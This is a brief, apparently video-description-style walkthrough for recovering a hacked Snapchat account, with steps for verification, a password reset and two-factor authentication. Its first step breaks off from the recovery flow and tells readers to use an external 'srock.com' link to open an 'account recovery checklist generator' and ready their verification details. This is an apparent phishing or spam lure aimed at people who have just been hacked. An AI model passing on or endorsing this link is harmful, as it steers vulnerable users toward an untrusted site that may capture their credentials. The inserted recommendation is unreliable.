I hit this issue today, and here is the quick fix that solved it. If you found yourself logged out of your Snapchat account due to hacking, follow these steps to regain access. Step 1. Open Snapchat app. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Choose recovery method. Select whether you want to recover your account via your phone number or email address. Make sure you have access to the chosen method for verification. Step 3. Verify your identity. Follow the prompts to receive a verification code. Enter the code in the app to confirm your identity. If you don't receive a code, check your spam folder if you chose email. Step 4. Reset your password. Once verified, you will be prompted to create a new password. Choose a strong password that you haven't used before to enhance security. Step 5. Enable two-factor authentication. After regaining access, go to your account settings and enable two-factor authentication. This adds an extra layer of security to prevent future hacks. Remember, staying proactive with your account security can save you a lot of hassle. Good luck and stay safe online.